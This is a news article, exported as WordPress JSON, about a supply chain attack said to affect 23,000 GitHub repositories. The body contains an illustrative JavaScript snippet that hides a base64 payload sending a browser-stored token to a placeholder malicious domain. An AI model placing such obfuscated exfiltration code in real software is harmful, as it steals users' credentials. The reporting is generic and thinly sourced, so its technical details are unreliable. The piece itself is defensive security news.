{"id":96173,"date":"2025-03-17T18:31:11","date_gmt":"2025-03-17T18:31:11","guid":{"rendered":"https:\/\/cybersecuritynews.com\/?p=96173"},"modified":"2025-03-17T18:31:15","modified_gmt":"2025-03-17T18:31:15","slug":"23000-github-repositories-targeted","status":"publish","type":"post","link":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/","title":{"rendered":"23,000 GitHub Repositories Targeted In Supply Chain Attack"},"content":{"rendered":"\n

In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised in what security experts are calling one of the largest supply chain attacks to date.<\/p>\n\n\n\n

The attackers exploited vulnerabilities in the software development<\/a> pipeline to potentially distribute malicious code to thousands of downstream applications and services.<\/p>\n\n\n\n

GitHub, a platform hosting over 200 million repositories and used by more than 100 million developers worldwide, confirmed the attack after several popular open-source projects reported unauthorized commits to their codebases.<\/p>\n\n\n\n

These repositories collectively serve as dependencies for millions of applications, amplifying the potential impact of this security incident.<\/p>\n\n\n\n

StepSecurity Security researchers identified<\/a> the attack pattern after noticing suspicious commit activities across multiple unrelated repositories.<\/p>\n\n\n\n

The attack primarily targeted repositories with high download counts and those used as dependencies in enterprise applications, revealing a calculated strategy to maximize impact.<\/p>\n\n\n\n

Technical analysis revealed the attackers used a sophisticated approach to compromise maintainer accounts through a combination of phishing attacks and exploiting token leaks.<\/p>\n\n\n\n

Once gaining access, they injected malicious code snippets designed to be difficult to detect during routine code reviews.<\/p>\n\n\n\n

The injected code typically contained obfuscated payloads similar to the example below:-<\/p>\n\n\n\n

function validate(input) {\n  \/\/ Legitimate-looking function\n  let result = checkFormat(input);\n\n  \/\/ Malicious payload hidden within normal code\n  setTimeout(() => {\n    new Function(atob(\"ZmV0Y2goJ2h0dHBzOi8vbWFsaWNpb3VzLWRvbWFpbi5jb20vYycsIHttZXRob2Q6ICdQT1NUJywgYm9keTogSlNPTi5zdHJpbmdpZnkoe2Q6IGxvY2FsU3RvcmFnZS5nZXRJdGVtKCd0b2tlbicpfSl9KTs=\"))();\n  }, 10000);\n\n  return result;\n}<\/code><\/pre>\n\n\n
\n
\"\"
Malicious commit (Source – StepSecurity)<\/figcaption><\/figure><\/div>\n\n\n
Mitigation Efforts<\/strong><\/h2>\n\n\n\n
Project maintainers are advised to audit recent commits, especially those modifying package configuration files or dependency declarations.<\/p>\n\n\n\n
GitHub has temporarily restricted access to the affected repositories while working with maintainers to revert malicious changes and implement additional security measures<\/a>.<\/p>\n\n\n\n
Security experts recommend users check their dependencies urgently and update to verified versions.<\/p>\n\n\n\n
Organizations should review their software supply chain security practices and implement automated scanning tools to detect potential compromises before they impact production systems.<\/p>\n\n\n
\n
\"\"
Workflow (Source – StepSecurity)<\/figcaption><\/figure><\/div>\n\n\n
The attack shows the growing importance of securing the software supply chain<\/a>, as a single compromised dependency can affect thousands of downstream applications and expose sensitive data across numerous organizations.<\/p>\n\n\n\n
Are you from SOC\/DFIR Teams? \u2013 Analyse Malware Incidents & get live Access with ANY.RUN ->\u00a0Start Now for Free<\/a>.<\/strong><\/code><\/strong><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"
In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised in what security experts are calling one of the largest supply chain attacks to date. The attackers exploited vulnerabilities in the software development pipeline to potentially distribute malicious code to thousands of downstream applications and services. GitHub, a platform hosting […]<\/p>\n","protected":false},"author":6,"featured_media":96175,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[11,9],"tags":[144,151],"class_list":{"0":"post-96173","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cyber-security-news","8":"category-cyber-attack","9":"tag-cyber-attack","10":"tag-cyber-security-news"},"yoast_head":"\n23,000 GitHub Repositories Targeted In Supply Chain Attack<\/title>\n<meta name=\"description\" content=\"In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"23,000 GitHub Repositories Targeted In Supply Chain Attack\" \/>\n<meta property=\"og:description\" content=\"In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/\" \/>\n<meta property=\"og:site_name\" content=\"Cyber Security News\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Hackingtutorialsandnews\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-17T18:31:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-03-17T18:31:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp\" \/><meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Tushar Subhra Dutta\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:site\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Tushar Subhra Dutta\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"23,000 GitHub Repositories Targeted In Supply Chain Attack","description":"In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/","og_locale":"en_US","og_type":"article","og_title":"23,000 GitHub Repositories Targeted In Supply Chain Attack","og_description":"In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised.","og_url":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/","og_site_name":"Cyber Security News","article_publisher":"https:\/\/www.facebook.com\/Hackingtutorialsandnews","article_published_time":"2025-03-17T18:31:11+00:00","article_modified_time":"2025-03-17T18:31:15+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp","type":"","width":"","height":""},{"width":1600,"height":900,"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp","type":"image\/jpeg"}],"author":"Tushar Subhra Dutta","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp","twitter_creator":"@The_Cyber_News","twitter_site":"@The_Cyber_News","twitter_misc":{"Written by":"Tushar Subhra Dutta","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/#article","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/"},"author":{"name":"Tushar Subhra Dutta","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c"},"headline":"23,000 GitHub Repositories Targeted In Supply Chain Attack","datePublished":"2025-03-17T18:31:11+00:00","dateModified":"2025-03-17T18:31:15+00:00","mainEntityOfPage":{"@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/"},"wordCount":314,"publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"image":{"@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/#primaryimage"},"thumbnailUrl":"https:\/\/i3.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp?w=1600&resize=1600,900&ssl=1","keywords":["cyber attack","cyber security news"],"articleSection":["Cyber Security News","Cyberattack News"],"inLanguage":"en-US","copyrightYear":"2025","copyrightHolder":{"@id":"https:\/\/cybersecuritynews.com\/#organization"}},{"@type":"WebPage","@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/","url":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/","name":"23,000 GitHub Repositories Targeted In Supply Chain Attack","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/#primaryimage"},"image":{"@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/#primaryimage"},"thumbnailUrl":"https:\/\/i3.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp?w=1600&resize=1600,900&ssl=1","datePublished":"2025-03-17T18:31:11+00:00","dateModified":"2025-03-17T18:31:15+00:00","description":"In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised.","breadcrumb":{"@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/#primaryimage","url":"https:\/\/i3.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp?w=1600&resize=1600,900&ssl=1","contentUrl":"https:\/\/i3.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp?w=1600&resize=1600,900&ssl=1","width":"1600","height":"900"},{"@type":"BreadcrumbList","@id":"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/cybersecuritynews.com\/"},{"@type":"ListItem","position":2,"name":"23,000 GitHub Repositories Targeted In Supply Chain Attack"}]},{"@type":"WebSite","@id":"https:\/\/cybersecuritynews.com\/#website","url":"https:\/\/cybersecuritynews.com\/","name":"Cyber Security News","description":"World's #1 Premier Cybersecurity and Hacking News Portal","publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/cybersecuritynews.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/cybersecuritynews.com\/#organization","name":"Cyber Security News","url":"https:\/\/cybersecuritynews.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/","url":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","contentUrl":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","width":200,"height":200,"caption":"Cyber Security News"},"image":{"@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Hackingtutorialsandnews","https:\/\/x.com\/The_Cyber_News","https:\/\/www.linkedin.com\/company\/cybersecurity-news\/"]},{"@type":"Person","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c","name":"Tushar Subhra Dutta","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","caption":"Tushar Subhra Dutta"},"description":"Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.","url":"https:\/\/cybersecuritynews.com\/author\/tushar\/"}]}},"jetpack_featured_media_url":"https:\/\/i3.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9jNHRWv79llcLwCoHYukkVYPM6fmxFF14YVphxhzeODrNCEZf8PoukrWcemhj8951k73bbgCTFFkmv3fIfMgYb5MYtY37onJvFddCPY63N78GjmiuAYSLrV8QH0_-AkLTGfjtvjUd77bCrfoVy364Kg1ojtc0OL_yWBsYsV3XyGmSERVzk3yI0Igmh64\/s16000\/23,000%20GitHub%20Repositories%20Targeted%20In%20Supply%20Chain%20Attack.webp?w=1600&resize=1600,900&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/96173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/comments?post=96173"}],"version-history":[{"count":1,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/96173\/revisions"}],"predecessor-version":[{"id":96174,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/96173\/revisions\/96174"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media\/96175"}],"wp:attachment":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media?parent=96173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/categories?post=96173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/tags?post=96173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}